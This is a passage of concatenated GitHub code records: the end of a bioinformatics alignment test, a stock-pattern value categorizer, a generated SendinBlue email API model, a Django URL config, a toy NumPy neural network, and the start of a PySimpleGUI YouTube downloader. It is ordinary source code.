os.path.join(dbFldr,'maf')# multiz100-way MAF files\n\textnsnMAF = '.maf' # extension for the MAF files\n\textnsnSVMicro = '.svm'# extension of UTR file for SVMicro\n\tsppRef = 'hg19' #spp code for UCSC alignments (i.e. a name==hg19)\n\tpthToUCSCKEGG = os.path.join(dbFldr,'dbUCSCtKEGG.tsv')\n\tlObjcts_Isfrm = mkLObjct_Isfrm()\n\t#--------------------------------------------------------\n\t#~ Define output folders\n\talignmntsFldr = os.path.join(dbFldr,'alignments')\n\tif not os.path.exists(alignmntsFldr):\n\t\tos.mkdir(alignmntsFldr)\n\t#--------------------------------------------------------\n\t#~ Return alignments for protein coding isoforms\n\talignments.procssUTRSVMicro(lObjcts_Isfrm,pthToPhstCns, \\\n\textnsnPhstCns,alignmntsFldr,extnsnSVMicro,pthToMAF,extnsnMAF, \\\n\tsppRef,pthToUCSCKEGG)\n\t#--------------------------------------------------------\n\t#~ Test result\n\tinFst = os.path.join(alignmntsFldr,'%s%s'%(lObjcts_Isfrm[0].name, \\\n\textnsnSVMicro))\n\tseqTest = dict([(seq.splitlines()[1].split()[1], \\\n\tseq.splitlines()[1].split()[3]) for seq in open(inFst).read(). 
\\\n\tsplit('>') if seq.strip()])['ENST00000536489']\n\treturn seqTest\n\n\n#--------------------------------------------------------\n#~ run test\nclass TestAlignmentMethods(unittest.TestCase):\n\tglobal trueSeq\n\ttrueSeq = ''.join(['ATTGACTTAAGTCCCAGTGATTCAGCTCCTCATCTGGAA', \\\n\t'CACCTCGGGTCACCCCCGACAACGGTGGTGGGAGGGAGAGCGGCCTCCTCCTCCCTGGTGGGG', \\\n\t'CCTGTCTGGGTGAAGCCCCTCTGTTCCCGATGTGACTCCCCACCCCCAGCCGGGTGCTCCGAG', \\\n\t'CCATGGCCGACACCATCTTCGGCAGCGGGAATGATCAGTGGGTTTGCCCCAATGACCGGCAGC', \\\n\t'TTGCCCTTCGAGCCAAGCTGCAGACGGGCTGGTCCGTGCACACCTACCAGACGGAGAAGCAGA', \\\n\t'GGAGGAAGCAGCACCTCAGCCCGGCGGAGGTGGAGGCCATCCTGCAGGTCATCCAGAGGGCAG', \\\n\t'AGCGGCTCGACGTCCTGGAGCAGCAGAGAATCGGGCGGCTGGTGGAGCGGCTGGAGACCATGA', \\\n\t'GGCGGAATGTGATGGGGAACGGCCTGTCCCAGTGTCTGCTCTGCGGGGAGGTGCTGGGCTTCC', \\\n\t'TGGGCAGCTCGTCGGTGTTCTGCAAAGACTGCAGGAAGGTCTGGAAGAGGTCGGGGGCCTGGT', \\\n\t'TCTACAAAGGGCTCCCCAAGTATATCTTGCCCCTGAAGACCCCTGGCCGAGCTGATGACCCCC', \\\n\t'ACTTCCGACCTTTGCCCACGGAACCGGCAGAGCGAGAGCCCAGAAGCTCTGAGACCAGCCGCA', \\\n\t'TCTACACGTGGGCCCGAGGAAGAGTGGTTTCCAGTGACAGTGACAGTGACTCGGATCTTAGCT', \\\n\t'CCTCCAGCCTAGAGGACAGACTCCCATCCACTGGGGTCAGGGACCGGAAAGGCGACAAACCCT', \\\n\t'GGAAGGAGTCAGGTGGCAGCGTGGAGGCCCCCAGGATGGGGTTCACCCACCCGCCGGGCCACC', \\\n\t'TCTCTGGGTGCCAGAGCAGCCTGGCCAGTGGTGAGACGGGGACAGGCTCTGCTGACCCGCCAG', \\\n\t'GGGGACCCCGCCCCGGGCTGACCCGAAGGGCCCCGGTAAAAGACACACCTGGACGAGCCCCCG', \\\n\t'CTGCTGACGCAGCTCCAGCAGGCCCCTCCAGCTGCCTGGGCTGAGGTGTCTGGTGCCTGGAAC', \\\n\t'AGACTTCCCTGTGGAGGATTCCTGCCAGACCCTGCCCGGCTCCTCCCTGACCGGTCCTTGTGC', \\\n\t'CCTCACCAGACACCCTGTTGGCCATGACTCAACAAACCAGTGTTGGGAGCCGTCTGCCTCCCC', \\\n\t'AGCTCAGTGCCTTTCTGCACCCCTTCTCTCCTGGGGAGCTGTCTGCATCCGCCACCCCCTCC'])\n\t#--------------------------------------------------------\n\tdef test_fastaMirMap(self):\n\t\tself.assertEqual(runTest_fastaMirMap(),trueSeq)\n\tdef test_fastaRNAhybridPITAmiRanda(self):\n\t\tself.assertEqual(runTest_fastaRNAhybridPITAmiRanda(),trueSeq)\n\tdef test_targetMiner(self):\n\t\tself.assertEqual(runTest_targetMiner(),trueSeq)\n\tdef test_targetScan(self):\n\t\tself.assertEqual(runTest_targetScan(),trueSeq)\n\tdef test_SVMicro(self):\n\t\tself.assertEqual(runTest_SVMicro(),trueSeq)\n\t\n\t\t\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"oscarcbr/cellery","sub_path":"tests/test_alignments.py","file_name":"test_alignments.py","file_ext":"py","file_size_in_byte":12105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26980222639","text":"import pandas as pd\nfrom sertl_analytics.constants.pattern_constants import CN, SVC\nfrom sertl_analytics.mydates import MyDate\nfrom pattern_system_configuration import SystemConfiguration\nimport numpy as np\nimport math\n\n\nclass ValueCategorizer:\n def __init__(self, sys_config: SystemConfiguration, df: pd.DataFrame, f_upper, f_lower, h_upper, h_lower):\n # ToDo: To eliminate spikes we could take the extrema of the corpus of a candle - not the shadows\n self.sys_config = sys_config\n self._index_column = CN.TIMESTAMP\n self.df = df\n self.df_length = self.df.shape[0]\n self._f_upper = f_upper\n self._f_lower = f_lower\n self._h_upper = h_upper\n self._h_lower = h_lower\n self._tolerance_pct = self.sys_config.get_value_categorizer_tolerance_pct()\n self._tolerance_pct_equal = self.sys_config.get_value_categorizer_tolerance_pct_equal()\n self._tolerance_pct_buying = self.sys_config.get_value_categorizer_tolerance_pct_buying()\n self.value_category_dic_key_list = []\n self.value_category_dic = {} # list of value categories by 
_index_column of each extrema entry\n self.value_category_dic_for_pos = {} # list of value categories by position of each extrema entry\n self.value_pos_list = []\n # self.value_pos_list = []\n self.__set_f_upper_f_lower_values__()\n self.__set_h_upper_h_lower_values__()\n self.__calculate_value_categories__()\n\n def get_number_upper_touches(self, ts_start=0, ts_end=math.inf) -> int:\n return self.count_value_category(SVC.U_on, ts_start, ts_end)\n\n def get_number_lower_touches(self, ts_start=0, ts_end=math.inf) -> int:\n return self.count_value_category(SVC.L_on, ts_start, ts_end)\n\n def are_all_values_above_f_lower(self, with_tolerance: bool = False) -> bool: # TODO with_tolerance\n tolerance = self.df[CN.LOW].mean() * self._tolerance_pct\n df_local = self.df[self.df[CN.LOW] < self.df[CN.F_LOWER] - tolerance]\n return df_local.shape[0] == 0\n\n def are_all_values_in_value_category(self, value_category: str) -> bool:\n return self.df_length == self.count_value_category(value_category)\n\n def are_all_values_in_value_category_list(self, value_categories: list) -> bool:\n for key in self.value_category_dic:\n if not set(self.value_category_dic[key]).issubset(set(value_categories)):\n return False\n return True\n\n def is_value_in_category(self, value: float, time_stamp: int, value_category: str, print_range=False):\n data_series = self.__get_data_series_for_value__(time_stamp, value)\n value_categories = self.__get_value_categories_for_df_row__(data_series)\n is_in_category = value_category in value_categories\n if is_in_category and print_range:\n self.__print_value_range_for_category__(data_series, value_category)\n return is_in_category\n\n def __get_data_series_for_value__(self, time_stamp, value=0.0):\n data_dict = {CN.F_UPPER: self._f_upper(time_stamp),\n CN.H_UPPER: self._h_upper(time_stamp),\n CN.F_LOWER: self._f_lower(time_stamp),\n CN.H_LOWER: self._h_lower(time_stamp),\n CN.HIGH: value, CN.LOW: value, CN.OPEN: value, CN.CLOSE: value}\n return pd.Series(data_dict)\n\n def are_helper_functions_available(self):\n if self._h_lower is None or self._h_upper is None:\n return False\n return self._h_upper != self._f_upper or self._h_lower != self._f_lower\n\n def __set_f_upper_f_lower_values__(self):\n self.df = self.df.assign(F_UPPER=(self._f_upper(self.df[self._index_column])))\n self.df = self.df.assign(F_LOWER=(self._f_lower(self.df[self._index_column])))\n\n def __set_h_upper_h_lower_values__(self):\n if self.are_helper_functions_available():\n self.df = self.df.assign(H_UPPER=(self._h_upper(self.df[self._index_column])))\n self.df = self.df.assign(H_LOWER=(self._h_lower(self.df[self._index_column])))\n\n def count_value_category(self, category: str, ts_start=0, ts_end=math.inf) -> int:\n filtered_list = [self.value_category_dic[key] for key in self.value_category_dic_key_list\n if ts_start <= key <= ts_end]\n hit_list_counter = sum([1 for category_list in filtered_list if category in category_list])\n self.__print_count_value_category_details__(ts_start, hit_list_counter, category)\n return hit_list_counter\n\n @staticmethod\n def __print_count_value_category_details__(ts_start: int, hit_list_counter: int, category: str):\n if ts_start == 0 or hit_list_counter == 0: # we print only available numbers\n return\n ts_start_time = MyDate.get_date_time_from_epoch_seconds(ts_start)\n # print('pattern.count_value_category for {}: hit_list_counter={}: after: {}'.format(\n # category, hit_list_counter, ts_start_time))\n\n def __calculate_value_categories__(self):\n for ind, row in 
self.df.iterrows():\n self.value_category_dic_key_list.append(row[self._index_column])\n self.value_pos_list.append(row[CN.POSITION])\n if row[CN.F_UPPER] >= row[CN.F_LOWER]:\n self.value_category_dic[row[self._index_column]] = self.__get_value_categories_for_df_row__(row)\n self.value_category_dic_for_pos[row[CN.POSITION]] = self.value_category_dic[row[self._index_column]]\n # print('{}: _f_upper={:.4f} / high={}, low={} / _f_lower={:.4f}: {}'.format(\n # ind, row[CN.F_UPPER], row[CN.HIGH], row[CN.LOW], row[CN.F_LOWER],\n # self.value_category_dic_for_pos[row[CN.POSITION]]))\n else:\n self.value_category_dic[row[self._index_column]] = []\n self.value_category_dic_for_pos[row[CN.POSITION]] = []\n\n def __print_value_range_for_category__(self, data_series, value_category: str):\n l_value, u_value = self.__get_value_range_for_category__(data_series, value_category)\n print('Value range for category {}: [{:.2f}, {:.2f}]'.format(value_category, l_value, u_value))\n\n def get_value_range_for_category(self, time_stamp: float, value_category: str):\n data_series = self.__get_data_series_for_value__(time_stamp)\n return self.__get_value_range_for_category__(data_series, value_category)\n\n def __get_value_range_for_category__(self, row, value_category: str):\n lower_pct, upper_pct = 1 - self._tolerance_pct, 1 + self._tolerance_pct\n lower_pct_buying, upper_pct_buying = 1 - self._tolerance_pct_buying, 1 + self._tolerance_pct_buying\n if value_category == SVC.U_out:\n return row[CN.F_UPPER] * upper_pct, math.inf\n elif value_category == SVC.U_on:\n return row[CN.F_UPPER] * lower_pct, row[CN.F_UPPER] * upper_pct\n elif value_category == SVC.M_in:\n return row[CN.F_LOWER] * upper_pct, row[CN.F_UPPER] * lower_pct\n elif value_category == SVC.L_in:\n return row[CN.F_LOWER] * lower_pct, row[CN.F_LOWER] * upper_pct\n elif value_category == SVC.L_on:\n return row[CN.F_LOWER] * lower_pct, row[CN.F_LOWER] * upper_pct\n elif value_category == SVC.L_out:\n return -math.inf, row[CN.F_LOWER] * lower_pct\n elif value_category == SVC.H_U_out:\n return row[CN.H_UPPER] * upper_pct, math.inf\n elif value_category == SVC.H_M_in:\n return row[CN.H_LOWER] * upper_pct, row[CN.H_UPPER] * lower_pct\n elif value_category == SVC.H_L_out:\n return -math.inf, row[CN.H_LOWER] * lower_pct\n elif value_category == SVC.B_U_out:\n return row[CN.F_UPPER] * upper_pct_buying, math.inf\n elif value_category == SVC.B_L_out:\n return -math.inf, row[CN.F_LOWER] * lower_pct_buying\n else:\n return 0, 0\n\n def __get_value_categories_for_df_row__(self, row) -> list: # the series is important\n return_list = []\n # ToDo: M_in shouldn't be with U_on or L_on.... 
but to get this we have to redesign the pattern ranges....\n        if self.__is_row_value_equal_f_upper__(row):\n            return_list.append(SVC.U_on)\n        if self.__is_row_value_in_f_upper_range__(row):\n            return_list.append(SVC.U_in)\n        if self.__is_row_value_larger_f_upper__(row):\n            return_list.append(SVC.U_out)\n        if self.__is_row_value_equal_f_lower__(row):\n            return_list.append(SVC.L_on)\n        if self.__is_row_value_in_f_lower_range__(row):\n            return_list.append(SVC.L_in)\n        if not self.__is_any_high_or_low_in_list__(return_list) and self.__is_row_value_between_f_lower_f_upper__(row):\n            return_list.append(SVC.M_in)\n        if self.__is_row_value_smaller_f_lower__(row):\n            return_list.append(SVC.L_out)\n\n        if self.are_helper_functions_available():\n            self.__get_helper_values_categories_for_df_row__(return_list, row)\n        return return_list\n\n    def __get_helper_values_categories_for_df_row__(self, return_list, row):\n        if self.__is_row_value_larger_h_upper__(row):\n            return_list.append(SVC.H_U_out)\n        if self.__is_row_value_between_h_lower_h_upper__(row):\n            return_list.append(SVC.H_M_in)\n        if self.__is_row_value_smaller_h_lower__(row):\n            return_list.append(SVC.H_L_out)\n\n    def __is_row_value_in_f_upper_range__(self, row):\n        return abs(row[CN.HIGH] - row[CN.F_UPPER])/ row[CN.F_UPPER] <= self._tolerance_pct\n\n    def __is_row_value_in_h_upper_range__(self, row):\n        return abs(row[CN.HIGH] - row[CN.H_UPPER])/ row[CN.H_UPPER] <= self._tolerance_pct\n\n    def __is_row_value_in_f_lower_range__(self, row):\n        return abs(row[CN.LOW] - row[CN.F_LOWER]) / row[CN.F_LOWER] <= self._tolerance_pct\n\n    def __is_row_value_in_h_lower_range__(self, row):\n        return abs(row[CN.LOW] - row[CN.H_LOWER]) / row[CN.H_LOWER] <= self._tolerance_pct\n\n    @staticmethod\n    def __is_row_value_between_f_lower_f_upper__(row):\n        return row[CN.F_LOWER] < row[CN.LOW] <= row[CN.HIGH] < row[CN.F_UPPER]\n\n    @staticmethod\n    def __is_row_value_between_h_lower_h_upper__(row):\n        return row[CN.H_LOWER] < row[CN.LOW] <= row[CN.HIGH] < row[CN.H_UPPER]\n\n    def __is_row_value_larger_h_upper__(self, row):\n        return row[CN.HIGH] > row[CN.H_UPPER] and not self.__is_row_value_in_h_upper_range__(row)\n\n    def __is_row_value_equal_f_upper__(self, row):\n        value_pct = abs(row[CN.HIGH] - row[CN.F_UPPER]) / row[CN.F_UPPER]\n        return value_pct <= self._tolerance_pct_equal\n\n    def __is_row_value_larger_f_upper__(self, row):\n        return row[CN.HIGH] > row[CN.F_UPPER] and not self.__is_row_value_in_f_upper_range__(row)\n\n    @staticmethod\n    def __is_row_value_smaller_f_upper__(row):\n        return row[CN.HIGH] < row[CN.F_UPPER]\n\n    def __is_row_value_equal_f_lower__(self, row):\n        value_pct = abs(row[CN.LOW] - row[CN.F_LOWER]) / row[CN.F_LOWER]\n        return value_pct <= self._tolerance_pct_equal\n\n    @staticmethod\n    def __is_row_value_larger_f_lower__(row):\n        return row[CN.LOW] > row[CN.F_LOWER]\n\n    @staticmethod\n    def __is_any_high_or_low_in_list__(check_list: list):\n        high_low_set = {SVC.U_in, SVC.U_on, SVC.L_in, SVC.L_on}\n        intersections = high_low_set.intersection(set(check_list))\n        return len(intersections) > 0\n\n    def __is_row_value_smaller_f_lower__(self, row):\n        return row[CN.LOW] < row[CN.F_LOWER] and not self.__is_row_value_in_f_lower_range__(row)\n\n    def __is_row_value_smaller_h_lower__(self, row):\n        return row[CN.LOW] < row[CN.H_LOWER] and not self.__is_row_value_in_h_lower_range__(row)\n
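\n\n# --- Editor's illustrative sketch, not part of the original module ---\n# Every __is_row_value_*_range__ check above reduces to the same relative\n# tolerance test; restated standalone (helper name chosen for illustration):\ndef _within_pct_tolerance(value, reference, tolerance_pct):\n    # True when value deviates from reference by at most tolerance_pct (relative)\n    return abs(value - reference) / reference <= tolerance_pct\n\n\nclass ValueCategorizerHeadShoulder(ValueCategorizer): # currently we don't need a separate for ...Bottom\n    def __init__(self, sys_config: SystemConfiguration, pattern_range, df: pd.DataFrame,\n                 f_upper, f_lower, 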
class ValueCategorizerHeadShoulder(ValueCategorizer):  # currently we don't need a separate one for ...Bottom\n    def __init__(self, sys_config: SystemConfiguration, pattern_range, df: pd.DataFrame,\n                 f_upper, f_lower, h_upper, h_lower):\n        self._pattern_range = pattern_range\n        self._shoulder_timestamps = [self._pattern_range.hsf.tick_shoulder_left.time_stamp,\n                                     self._pattern_range.hsf.tick_shoulder_right.time_stamp]\n        ValueCategorizer.__init__(self, sys_config, df, f_upper, f_lower, h_upper, h_lower)\n\n    def __get_helper_values_categories_for_df_row__(self, return_list, row):\n        if row[CN.TIMESTAMP] in self._shoulder_timestamps:\n            if self.__is_row_value_equal_h__(row):\n                return_list.append(SVC.H_on)\n            if self.__is_row_value_in_h_range__(row):\n                return_list.append(SVC.H_in)\n\n    def __is_row_value_equal_h__(self, row):  # used for HEAD_SHOULDER - both helpers are identical\n        return self.__are_distance_values_in_tolerance_range__(row, self._tolerance_pct_equal)\n\n    def __is_row_value_in_h_range__(self, row):  # used for HEAD_SHOULDER - both helpers are identical\n        return self.__are_distance_values_in_tolerance_range__(row, self._tolerance_pct * 2.5)\n\n    def __are_distance_values_in_tolerance_range__(self, row, tolerance_pct):\n        distance_to_low, distance_to_high = self.__get_distance_values__(row)\n        return distance_to_low <= tolerance_pct or distance_to_high <= tolerance_pct\n\n    @staticmethod\n    def __get_distance_values__(row):\n        distance_to_low = round(abs(row[CN.LOW] - row[CN.H_LOWER]) / np.mean([row[CN.LOW], row[CN.H_LOWER]]), 4)\n        distance_to_high = round(abs(row[CN.HIGH] - row[CN.H_LOWER]) / np.mean([row[CN.HIGH], row[CN.H_LOWER]]), 4)\n        return distance_to_low, distance_to_high\n\n\n","repo_name":"SertlAnalytics/PycharmProjects","sub_path":"Gaming/Stocks/pattern_value_categorizer.py","file_name":"pattern_value_categorizer.py","file_ext":"py","file_size_in_byte":13650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"39708659661","text":"# coding: utf-8\n\n\"\"\"\n    SendinBlue API\n\n    SendinBlue provides a RESTful API that can be used with any language. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. 
Not Acceptable | # noqa: E501\n\n OpenAPI spec version: 3.0.0\n Contact: contact@sendinblue.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass SendSmtpEmailMessageVersions(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'to': 'list[SendSmtpEmailTo1]',\n 'params': 'dict(str, object)',\n 'bcc': 'list[SendSmtpEmailBcc]',\n 'cc': 'list[SendSmtpEmailCc]',\n 'reply_to': 'SendSmtpEmailReplyTo1',\n 'subject': 'str'\n }\n\n attribute_map = {\n 'to': 'to',\n 'params': 'params',\n 'bcc': 'bcc',\n 'cc': 'cc',\n 'reply_to': 'replyTo',\n 'subject': 'subject'\n }\n\n def __init__(self, to=None, params=None, bcc=None, cc=None, reply_to=None, subject=None): # noqa: E501\n \"\"\"SendSmtpEmailMessageVersions - a model defined in Swagger\"\"\" # noqa: E501\n\n self._to = None\n self._params = None\n self._bcc = None\n self._cc = None\n self._reply_to = None\n self._subject = None\n self.discriminator = None\n\n self.to = to\n if params is not None:\n self.params = params\n if bcc is not None:\n self.bcc = bcc\n if cc is not None:\n self.cc = cc\n if reply_to is not None:\n self.reply_to = reply_to\n if subject is not None:\n self.subject = subject\n\n @property\n def to(self):\n \"\"\"Gets the to of this SendSmtpEmailMessageVersions. # noqa: E501\n\n List of email addresses and names (_optional_) of the recipients. For example, [{\\\"name\\\":\\\"Jimmy\\\", \\\"email\\\":\\\"jimmy98@example.com\\\"}, {\\\"name\\\":\\\"Joe\\\", \\\"email\\\":\\\"joe@example.com\\\"}] # noqa: E501\n\n :return: The to of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: list[SendSmtpEmailTo1]\n \"\"\"\n return self._to\n\n @to.setter\n def to(self, to):\n \"\"\"Sets the to of this SendSmtpEmailMessageVersions.\n\n List of email addresses and names (_optional_) of the recipients. For example, [{\\\"name\\\":\\\"Jimmy\\\", \\\"email\\\":\\\"jimmy98@example.com\\\"}, {\\\"name\\\":\\\"Joe\\\", \\\"email\\\":\\\"joe@example.com\\\"}] # noqa: E501\n\n :param to: The to of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: list[SendSmtpEmailTo1]\n \"\"\"\n if to is None:\n raise ValueError(\"Invalid value for `to`, must not be `None`\") # noqa: E501\n\n self._to = to\n\n @property\n def params(self):\n \"\"\"Gets the params of this SendSmtpEmailMessageVersions. # noqa: E501\n\n Pass the set of attributes to customize the template. For example, {\\\"FNAME\\\":\\\"Joe\\\", \\\"LNAME\\\":\\\"Doe\\\"}. It's considered only if template is in New Template Language format. # noqa: E501\n\n :return: The params of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: dict(str, object)\n \"\"\"\n return self._params\n\n @params.setter\n def params(self, params):\n \"\"\"Sets the params of this SendSmtpEmailMessageVersions.\n\n Pass the set of attributes to customize the template. For example, {\\\"FNAME\\\":\\\"Joe\\\", \\\"LNAME\\\":\\\"Doe\\\"}. It's considered only if template is in New Template Language format. # noqa: E501\n\n :param params: The params of this SendSmtpEmailMessageVersions. 
# noqa: E501\n :type: dict(str, object)\n \"\"\"\n\n self._params = params\n\n @property\n def bcc(self):\n \"\"\"Gets the bcc of this SendSmtpEmailMessageVersions. # noqa: E501\n\n List of email addresses and names (optional) of the recipients in bcc # noqa: E501\n\n :return: The bcc of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: list[SendSmtpEmailBcc]\n \"\"\"\n return self._bcc\n\n @bcc.setter\n def bcc(self, bcc):\n \"\"\"Sets the bcc of this SendSmtpEmailMessageVersions.\n\n List of email addresses and names (optional) of the recipients in bcc # noqa: E501\n\n :param bcc: The bcc of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: list[SendSmtpEmailBcc]\n \"\"\"\n\n self._bcc = bcc\n\n @property\n def cc(self):\n \"\"\"Gets the cc of this SendSmtpEmailMessageVersions. # noqa: E501\n\n List of email addresses and names (optional) of the recipients in cc # noqa: E501\n\n :return: The cc of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: list[SendSmtpEmailCc]\n \"\"\"\n return self._cc\n\n @cc.setter\n def cc(self, cc):\n \"\"\"Sets the cc of this SendSmtpEmailMessageVersions.\n\n List of email addresses and names (optional) of the recipients in cc # noqa: E501\n\n :param cc: The cc of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: list[SendSmtpEmailCc]\n \"\"\"\n\n self._cc = cc\n\n @property\n def reply_to(self):\n \"\"\"Gets the reply_to of this SendSmtpEmailMessageVersions. # noqa: E501\n\n\n :return: The reply_to of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: SendSmtpEmailReplyTo1\n \"\"\"\n return self._reply_to\n\n @reply_to.setter\n def reply_to(self, reply_to):\n \"\"\"Sets the reply_to of this SendSmtpEmailMessageVersions.\n\n\n :param reply_to: The reply_to of this SendSmtpEmailMessageVersions. # noqa: E501\n :type: SendSmtpEmailReplyTo1\n \"\"\"\n\n self._reply_to = reply_to\n\n @property\n def subject(self):\n \"\"\"Gets the subject of this SendSmtpEmailMessageVersions. # noqa: E501\n\n Custom subject specific to message version # noqa: E501\n\n :return: The subject of this SendSmtpEmailMessageVersions. # noqa: E501\n :rtype: str\n \"\"\"\n return self._subject\n\n @subject.setter\n def subject(self, subject):\n \"\"\"Sets the subject of this SendSmtpEmailMessageVersions.\n\n Custom subject specific to message version # noqa: E501\n\n :param subject: The subject of this SendSmtpEmailMessageVersions. 
# noqa: E501\n :type: str\n \"\"\"\n\n self._subject = subject\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(SendSmtpEmailMessageVersions, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, SendSmtpEmailMessageVersions):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"DT7Solutions/SumaFilmyArts","sub_path":"env-suma/Lib/site-packages/sib_api_v3_sdk/models/send_smtp_email_message_versions.py","file_name":"send_smtp_email_message_versions.py","file_ext":"py","file_size_in_byte":8863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29198918495","text":"from django.urls import path\n\nfrom intro import views\n\nurlpatterns = [\n path('intro/', views.show_name, name='hello'),\n path('all-students/', views.students, name='all_students'),\n path('all-movies/', views.all_awesome_movies, name='all_movies')\n]\n\n","repo_name":"Ucosmin194/DjangoProject","sub_path":"intro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42854800335","text":"import numpy as np\nimport math\nfrom data_creation import create_data\nimport matplotlib.pyplot as plt\n\n# a very simple layer object - it may grow with time.\nclass Layer_Dense:\n\n def __init__(self, n_inputs, n_neurons):\n self.weights = 0.10 * np.random.randn(n_inputs, n_neurons)\n self.biases = np.zeros((1, n_neurons)) # 1, n_neurons since bias is per neuron not per weight\n\n def forward(self, input):\n self.output = np.dot(input, self.weights) + self.biases\n\n\n'''\nReLU as can be seen in the print of the result leads to values being dropped \nand potentially lost when trying to calc the error.\n'''\nclass Activation_ReLU:\n def forward(self, inputs):\n self.output = np.maximum(0, inputs)\n\n\n'''\nInstead of ReLU try out Softmax which is a non-linear rather than linear such as ReLU\n\nFirst as tried out in exponentation_sketchpad.py use exponentiation and normalization\nto implement a Softmax activation function:\nsoftmax steps:\nInput -> Exponentiate -> Normalize -> Output\n\n'''\n\n\nclass Activation_Softmax:\n def forward(self, inputs, axis=1):\n '''\n :param inputs:\n :param axis:\n :return:\n # wexp = np.subtract(inputs, max(inputs))\n exp_values = np.exp(np.subtract(inputs, max(inputs)))\n self.output = exp_values / np.sum(exp_values, axis=axis, keepdims=True)\n '''\n exp_values = np.exp(inputs - np.max(inputs, axis=axis, keepdims=True))\n 
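        # A tiny worked example of the two steps above (my own illustration):
        # for inputs [[1.0, 2.0, 3.0]] the max-shifted exponents are
        # [e**-2, e**-1, e**0] ~= [0.135, 0.368, 1.0]; dividing each by their
        # sum (~1.503) gives ~[0.090, 0.245, 0.665], which sums to 1.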
        self.output = exp_values / np.sum(exp_values, axis=axis, keepdims=True)\n\n\n\n'''\nNow after all the testing concepts and trying out the different moving parts we\nshould be ready to try to assemble them into a simple, but working, neural network.\nWe use the created spiral data from cs231:\nhttps://cs231n.github.io/neural-networks-case-study/\n'''\nX, y = create_data(samples=100, classes=3)\n\n'''\nlooking at the created data, we should see a non-linear distribution of sample points.\nfrom MatplotlibLibrary import ConfigurableScatter\n\nprint(\"X: %s\" % X)\nConfigurableScatter(X[:, 0], X[:, 1]).withLabels(y, \"Created Test data\", \"X\", \"Y\")\n'''\n\n\n\n\ninputLayer = Layer_Dense(2, 5)\nactivation_relu = Activation_ReLU()\ninputLayer.forward(X)\nactivation_relu.forward(inputLayer.output)\n\nhiddenLayer1 = Layer_Dense(5, 5)\nactivation_softmax = Activation_Softmax()\n\n# feed the ReLU activations (not the raw dense output) into the next layer\nhiddenLayer1.forward(activation_relu.output)\n#print(\"MiddleLayer::output: %s\" % hiddenLayer1.output)\nactivation_softmax.forward(hiddenLayer1.output)\n\nprint(\"hiddenLayer1::output: %s\" % hiddenLayer1.output)\nprint(\"hiddenLayer1 activation_softmax::output: %s\" % activation_softmax.output)\n","repo_name":"amirrocker/ML-Training-Playground","sub_path":"NNFromScratch/scratchpad/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8353973872","text":"import PySimpleGUI as sg\r\nfrom pytube import YouTube\r\n\r\n# window layout heh\r\n\r\nsg.theme(\"DarkRed1\")\r\nlayout = [[sg.Text(\"Wstaw link z youtube\")],\r\n          [sg.InputText()],\r\n          [sg.Submit(), sg.Cancel()]]\r\n\r\nwindow = sg.Window(\"Pobieranie filmiku z youtube\", layout)\r\n\r\nevent, values = window.read()\r\nwindow.close()\r\n\r\n# Window 2\r\n\r\nlayout = [[sg.Text(\"Wstaw lokalizację pliku\")],\r\n          [sg.InputText()],\r\n          [sg.Submit(), sg.Cancel()]]\r\n\r\nwindow1 = sg.Window(\"Pobieranie filmiku z youtube\", layout)\r\n\r\nevent1, values1 = window1.read()\r\nwindow1.close()\r\n\r\n# final popup and some extra conversions\r\n\r\nlokalizacja = values1[0]\r\ntext_input = values[0]\r\nsg.popup(\"Pobieranie, program zrobiony przez 